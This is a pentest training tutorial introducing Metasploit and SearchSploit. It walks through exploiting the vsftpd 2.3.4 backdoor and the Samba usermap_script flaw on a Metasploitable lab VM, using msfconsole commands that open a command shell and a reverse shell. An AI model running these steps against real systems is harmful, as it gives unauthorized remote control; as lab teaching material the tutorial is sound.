Exploit Vulnerabilities using Metasploit


CompTIA PenTest PT0-002

Introduction to Metasploit

Metasploit is a mighty and elastic framework that you can use in the development, examination, and implementation of exploits. In 2003 H.D. Moore created it, but today it’s one of the most frequently used cybersecurity penetration testing tools around. Its purpose is to provide information about security vulnerabilities while helping with penetration testing and IDS signature development.

There are many parts to Metasploit:

  • msfconsole: The framework's main interface offers an efficient CLI (command-line interface) for accessing and managing features.
  • msfvenom: This combines Metasploit's payload generation –– msfpayload –– with its encoding capabilities –– msfencode. It lets users generate payloads and customize them.
  • Meterpreter: A sophisticated payload that operates on target memory in real-time. It provides further control and interaction.

Cybersecurity professionals use Metasploit for many reasons:

  • Vulnerability Assessment: Identifying vulnerabilities within systems or applications, then testing them.
  • Penetration Testing: Simulating cyber-attacks to gauge how secure systems are.
  • Exploit Development: Writing code meant to take advantage of a vulnerability so you can test it against an affected system or application.
  • Security Research: Studying vulnerabilities, creating new exploits, and building stronger security awareness overall.

 

Introduction to Exploits

In the realm of cybersecurity, being a professional requires an understanding of the difference between exploits and attacks. Exploits are software, data or sequence of commands that exploit vulnerabilities in systems in order to cause unintended behavior on computer software, hardware, or electronic (usually computerized) things. This behavior could include gaining control over system resources or accessing unauthorized data. Attacks on the other hand are a deliberate attempt by attackers to access, steal, destroy or manipulate information or to disrupt legitimate users' access.

 

The Exploit Development Lifecycle

The exploit development lifecycle is a systematic approach to finding vulnerabilities and developing and deploying exploits against a target system or application. It typically involves the following stages:

  1. Reconnaissance: Gathering information about target systems to identify potential vulnerabilities. This can involve scanning various tools of the system to learn its architecture, services and open ports.
  2. Vulnerability Analysis: Analyzing collected information to find weaknesses that can be exploited. It requires understanding what vulnerabilities do and how it can be used.
  3. Exploit Development: Building an exploit that targets identified weaknesses requires deep programming knowledge and understanding of attacked systems.
  4. Testing: Putting created exploit through tests in controlled environment ensures no damage is done while achieving goals as well as allows refining.
  5. Deployment: Using the built exploit against target system with goals such as unauthorized access or secret extraction in mind.
  6. Post-Exploitation: Tasking yourself with increasing privileges after successful exploitation helps you keep your access for long while avoiding detection.
  7. Analysis and Reporting: Documenting everything about results of your work from process itself through outcomes up until any possible impacts on attacked systems.

 

Difference between Exploits and Attacks

Although people often use them interchangeably "exploit" & "attack" have different meanings:

  • Exploit: An exploit is a tool or technique that uses vulnerability in software/systems in order provoke action developers did not intend for. The main focus here should be put on vulnerability itself and how it can be used to gain unauthorized access or information disclosure.
  • Attack: The term attack is much broader and can refer to any attempt of exposing, altering, disabling, stealing, destroying or gaining unauthorized access / unauthorized use of an asset. Although it usually involves using one or more exploits it's also about attacker intent and objectives.

 

Exploit Database: How to find and exploit vulnerabilities

A comprehensive compilation of exploits, security papers, and shellcode is stored in what is referred to as the Exploit Database (EDB). Security professionals, researchers, and ethical hackers leverage this database to unearth vulnerabilities in software and systems. Offensive Security manages it; the same organization that runs Kali Linux and OSCP certification. The EDB offers in-depth details on identified vulnerabilities together with their corresponding exploits. Because of this its an indispensable resource for both vulnerability assessments as well as penetration testing.

Here’s how you can use it:

  • Visit the Exploit Database website.
  • Use the search bar to key in related keywords associated with app targets, services involved or any vulnerability you are interested in.
  • You have options to search by software names, CVE (Common Vulnerabilities and Exposures) identifiers or any related term.
  • Advanced search options allow users to filter results either by author, type (e.g., remote, local, web apps), platform (e.g., Windows, Linux, web) or date.

SearchSploit is a command-line search tool meant for Exploit Database; It comes bundled with Kali Linux yet available on other platforms too. Offline searches for exploits can be done using it; coupled with updates from latest EDB entries.

On your Kali Linux terminal execute searchsploit <search terms>. For example, searchsploit apache 2.4.

Exploit Vulnerabilities using Metasploit

 

Vulnerability Scanning and Identification

In our previous article we have already performed OpenVAS scan against our Metasploitable VM which had reported a bunch of vulnerabilities. So in this article we will be trying to exploit those vulnerabilities.

 

DISCLAIMER:
This article is intended for educational purposes only. The tools and techniques discussed herein should be used in a legal, ethical manner, exclusively for security research or within authorized penetration testing activities. Unauthorized use of these tools against networks, systems, or applications without explicit permission can lead to legal consequences and ethical violations.

 

Exploiting Known Vulnerabilities using Metasploit

1. Exploit CVE-2011-2523

As per the OpenVAS scan report, Metasploitable has a known vulnerability for VSFTPD:

Issue
-----
NVT:    vsftpd Compromised Source Packages Backdoor Vulnerability
OID:    1.3.6.1.4.1.25623.1.0.103185
Threat: High (CVSS: 9.8)
Port:   6200/tcp

Summary:
vsftpd is prone to a backdoor vulnerability.

Affected Software/OS:
The vsftpd 2.3.4 source package downloaded between 20110630 and
  20110703 is affected.

Vulnerability Detection Method:
Details:
vsftpd Compromised Source Packages Backdoor Vulnerability
(OID: 1.3.6.1.4.1.25623.1.0.103185)
Version used: 2023-12-07T05:05:41Z

References:
 cve: CVE-2011-2523
 url: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
 url: https://web.archive.org/web/20210127090551/https://www.securityfocus.com/bid/48539/
 url: https://security.appspot.com/vsftpd.html

We will attempt to exploit this vulnerability using Metasploit available on Kali Linux.

  • Step 1: Open Metasploit with msfconsole in your terminal.
  • Step 2: Search for an exploit matching one of the vulnerabilities found. For example, if OpenVAS found a vulnerable vsFTPd server, you might use: search vsftpd.
  • Step 3: Use the appropriate exploit: use exploit/unix/ftp/vsftpd_234_backdoor.
  • Step 4: Set RHOSTS to the target's IP address: set RHOSTS [target_IP].
  • Step 5: Set the payload if necessary: set payload cmd/unix/interact.
  • Step 6: Execute the exploit: exploit.

Here are the steps executed on my msfconsole terminal and it shows successful exploitation of a known vulnerability in vsFTPd 2.3.4 using the Metasploit framework.

Exploit Vulnerabilities using Metasploit

The final line indicates that a command shell session was opened between our machine (10.10.1.10) and the target (10.10.1.11), through which we can execute commands directly on the compromised system. The port 6200 suggests that the backdoor listener was established on this non-standard port.

This would mean that we now have full administrative access to the target system, This allows us to perform any action on the target system such as modifying files, installing software, or accessing all data on the machine.

Here I have executed some commands on the connected shell:

Exploit Vulnerabilities using Metasploit

Hit exit to terminate the connected session

exit
[*] 10.10.1.11 - Command shell session 2 closed.

And the same file is successfully created on target system:

Exploit Vulnerabilities using Metasploit

 

2. Exploit CVE-2007-2447

My Metasploitable VM has also reported for CVE-2007-2447 which is a vulnerability in Samba's username map script. This vulnerability allows remote attackers to execute arbitrary commands via shell metacharacters involving the "username map script" setting when not properly sanitized.

Here are the details of the vulnerability:

Issue
-----
NVT:    Samba MS-RPC Remote Shell Command Execution Vulnerability - Active Check
OID:    1.3.6.1.4.1.25623.1.0.108011
Threat: Medium (CVSS: 6.0)
Port:   445/tcp

Product detection result: cpe:/a:samba:samba:3.0.20
Detected by: SMB NativeLanMan (OID: 1.3.6.1.4.1.25623.1.0.102011)

Summary:
Samba is prone to a vulnerability that allows attackers to
  execute arbitrary shell commands because the software fails to sanitize user-s!
upplied input.

Impact:
An attacker may leverage this issue to execute arbitrary shell
  commands on an affected system with the privileges of the application.

Product Detection Result:
Product:cpe:/a:samba:samba:3.0.20

Method:SMB NativeLanMan
(OID: 1.3.6.1.4.1.25623.1.0.102011)

References:
 cve: CVE-2007-2447
 url: http://www.securityfocus.com/bid/23972
 url: https://www.samba.org/samba/security/CVE-2007-2447.html

Let's again connect to msfconsole on our Kali Linux terminal and search for the Samba exploit.

Exploit Vulnerabilities using Metasploit

Select the exploit module:

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat

Set the target host (RHOSTS) to the IP address of the vulnerable system.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.1.11
RHOSTS => 10.10.1.11

Optionally, if you need to set the payload, you might choose a reverse shell payload

msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse

Set your local host IP address (LHOST) as needed for the reverse connection.

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.1.10
LHOST => 10.10.1.10

Type exploit to execute the exploit and we have successfully gained access to target system. We can also see the file which we had created in the previous step on target system.

Exploit Vulnerabilities using Metasploit

 

Deepak Prasad

Deepak Prasad

He is the founder of GoLinuxCloud and brings over a decade of expertise in Linux, Python, Go, Laravel, DevOps, Kubernetes, Git, Shell scripting, OpenShift, AWS, Networking, and Security. With extensive experience, he excels in various domains, from development to DevOps, Networking, and Security, ensuring robust and efficient solutions for diverse projects. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

Leave a Comment